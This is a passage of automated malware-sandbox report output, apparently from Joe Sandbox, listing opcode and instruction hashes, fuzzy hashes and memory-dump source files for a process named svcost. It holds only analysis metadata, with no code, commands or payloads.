                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: b7acca189affe71fa64de8d59591705e7ae1278d23e109aca9503e26489cfd51
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: 5AE0C974E05208EFCB44DFA9D554A9DFBB5EB48300F10C1AADC1893340D6329A52DF85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7840d9fea8244bd65969492e7811312846c07e9cb2ee0188e8195d10311e3bb
                                                                                                • Instruction ID: e2416065e034ebb43952bfb23b5dfea119ee1228c220a68d1f31c971ae00b9fd
                                                                                                • Opcode Fuzzy Hash: e7840d9fea8244bd65969492e7811312846c07e9cb2ee0188e8195d10311e3bb
                                                                                                • Instruction Fuzzy Hash: B8F0393480420CEFCB00DF94E950AACBBB5EB48300F10C0A9EC1852350CA329A61EF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bac56f017d45e2df28a2eb72fe55fd0080fc5e19ca84d411f964dbb029f5e9d3
                                                                                                • Instruction ID: a52f46275023a6e7eacca765a391996f7db1cf9611a7a3961a3328934f18698f
                                                                                                • Opcode Fuzzy Hash: bac56f017d45e2df28a2eb72fe55fd0080fc5e19ca84d411f964dbb029f5e9d3
                                                                                                • Instruction Fuzzy Hash: 06E06534804208EFCB04CF90E900EADBB75EB48300F108199EC0523250CB329A22EF82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f6ef43133b244d1684972aa53122282f70930dee48b07fa1d6bee5f5a132d5e
                                                                                                • Instruction ID: c903dd402245ccea2d51796dc52b31a8d55ed5818777d08feb940a4012c51dea
                                                                                                • Opcode Fuzzy Hash: 4f6ef43133b244d1684972aa53122282f70930dee48b07fa1d6bee5f5a132d5e
                                                                                                • Instruction Fuzzy Hash: 72F0D474919328CFDB29DF69CA94A9CBBF6BF44320F1491A9D009A3265D7316D82CF01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a3265302cdc39538ab2026a439126f4a6f93a526242fb60f90e8a9ae2e240e0
                                                                                                • Instruction ID: 25fbb85399b5029df1baf8407868041eaa44f09b7d60fd709b362c2289c822dc
                                                                                                • Opcode Fuzzy Hash: 1a3265302cdc39538ab2026a439126f4a6f93a526242fb60f90e8a9ae2e240e0
                                                                                                • Instruction Fuzzy Hash: 1BE08C31740324ABEBA47AB49A20B6632C9DF857A5F211079DB059B280D9B2F80287A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Opcode ID: 6761de6f9c2263e099d244fd11e260a32e7a72d16ed6b072dc2a6f76a9b77693
                                                                                                • Instruction ID: 7656352981247d1e6d8dcc247210167d9e2918c5f90127c14aa3cb6cdd236f60
                                                                                                • Opcode Fuzzy Hash: 6761de6f9c2263e099d244fd11e260a32e7a72d16ed6b072dc2a6f76a9b77693
                                                                                                • Instruction Fuzzy Hash: A5E0EC74905208DBC704DF94EA55A6DBB79EB45304F2091A9880917341CA329E46DB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a1ac48e857b081e55c58b5afb49cebf8c4aa86a9d7a74ffa9826a658e1b8f7c5
                                                                                                • Instruction ID: 9eef59ddd1d825703b61359bef1b14cb5073c1cbdc2d3830b0e01177ef03abdb
                                                                                                • Opcode Fuzzy Hash: a1ac48e857b081e55c58b5afb49cebf8c4aa86a9d7a74ffa9826a658e1b8f7c5
                                                                                                • Instruction Fuzzy Hash: AAE0EC3495630DDFCB40DFA8D999A9DBBB8EB05301F1041A98809A3250EB315A44CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6ec2d9b502f40f035d1ef51d2a123d454f160bb193fb6e1be681cd3c5fdda093
                                                                                                • Instruction ID: 9d53a63617095efc6b8a6fb5a7dd5103785cc18da81dbd679d51dfab5ecec290
                                                                                                • Opcode Fuzzy Hash: 6ec2d9b502f40f035d1ef51d2a123d454f160bb193fb6e1be681cd3c5fdda093
                                                                                                • Instruction Fuzzy Hash: AAE0127194520C9FDB06FFB09914A9F77A8EF06204F1044F6D50597250DE325A089B96
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5412b03bae86c78f5ca1657c29e516c473638343c97bd263c4838392bd4e1f05
                                                                                                • Instruction ID: bd534638d35dedc6a17aa82b0862a5995ea73425809918cccafbf569c895b0bb
                                                                                                • Opcode Fuzzy Hash: 5412b03bae86c78f5ca1657c29e516c473638343c97bd263c4838392bd4e1f05
                                                                                                • Instruction Fuzzy Hash: A2E08C34909208DBC704DF94E9549ADBB78EB45315F1081E98C0923340CB32AA02CB89
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5aafff6cc8fe306f8544b9e7bfcadf8103ecc7dfd62601ce88f5baa0eccb350a
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 79E0EC34905208EBC708DF94EA5596DBBB9EB45304F2091A9880827382CB329E46DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 0a9956bf53d29395323523e226acb21c0b90dc5334d4ae21b679bc6d77c05c87
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 16E01234905208EBC704EF95EA55A6DFB79EB45304F2491EDC80817341CB329E46DB82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 60a2e17ed99147f39db7c165fc7f071485cec8c5fe82322ff9103835ea83432a
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: B0E01234909258DBC704DF94E95596DFB78EB45304F2092EDC80927341CF369F46DB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b97084689bfdfb03deaaf82c447cd178549b9913ad9a6281c9412956a77e1157
                                                                                                • Instruction ID: e4ed79b9b3f768e81ff8c28f915b78cf40e3a25cfc26d2fed56d60b318c4f1f0
                                                                                                • Opcode Fuzzy Hash: b97084689bfdfb03deaaf82c447cd178549b9913ad9a6281c9412956a77e1157
                                                                                                • Instruction Fuzzy Hash: 03E08C30905258DFCB41EFA8E564AACBFB0EB0A305F2482E9CC5857751D6328E02CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a63ff089d5f5be6766760804a2575a903cd010e0e7b23c4748c6a7119eff4087
                                                                                                • Instruction ID: b7c8a66ffa430ea4053eb89e337cf69cddf3f40db833c7f324236357e1a4c338
                                                                                                • Opcode Fuzzy Hash: a63ff089d5f5be6766760804a2575a903cd010e0e7b23c4748c6a7119eff4087
                                                                                                • Instruction Fuzzy Hash: 9DE0127194220C9FD701EBB59914A9EB7A8EF06304F1041B5D50497150DE325A049BE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5b24c4c1138e3f7bde63b4e8387f44de2db89d6bbc16eef7c2b8664cc208ad71
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: A9E0C234D09208DBC704EF94F99496CFB78EB45304F2092E9D80813340CB329E02CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: e41f92dbd3b8699fe5e05230e5b9770ab636cba538488c65e53d5ca36b4a3c10
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: F4E0EC34905208DBCB04EF95E95596DBB78EB85304F2095E9880817341CA329E46DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 3967d37eaf70a3b391a12eae9fd3814bebead8ec9c2194d88770198f08f70151
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 11E01234909208DBC704DF95E9A597DFB78EF85304F2092E9C81817341DB729E56DB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 6adae5646d6aceb80b943fa409323d838115e23e2440cbf1aa74018b52855fde
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 22E01234945208DBCB14DFD4FA55A6DFB78EB45304F2091E9D81C17341CB329E56DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5e35f15b84e9f2caf3b285d9539f3d25d3b78cd8fecb8f2af9e6a8f67d9e5693
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: BDE0EC34905208DBC704DB94EA5596DBB78EB45304F2491A99C1817741DB329E46DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 28c3fcae781cb25eb89da5a6af160a8a0fa0e6a3e2fd5c36d8223c297531e869
                                                                                                • Instruction ID: b0daf6b15d34fc9074a3ea91c702bf3ed4883c23442d4b545faf905667e2bb6c
                                                                                                • Opcode Fuzzy Hash: 28c3fcae781cb25eb89da5a6af160a8a0fa0e6a3e2fd5c36d8223c297531e869
                                                                                                • Instruction Fuzzy Hash: 1DE0EC30905218EFCB40DFB8DA5DA9DBBB8EB05305F1051A99808A3250EB316B44DB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1f9580bb3374aa3bdc0704808ff5aa8774dd7f66c40489649aee1dcd05e39487
                                                                                                • Instruction ID: 6d0eef253fd89f9defceb2091bc3327bdfc30b61f3f929f02e2502a85f4a6dda
                                                                                                • Opcode Fuzzy Hash: 1f9580bb3374aa3bdc0704808ff5aa8774dd7f66c40489649aee1dcd05e39487
                                                                                                • Instruction Fuzzy Hash: 18E0C234905208EBC704DF94EA5496CFB79FB4A304F1091ECC80813340CB32AE12DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin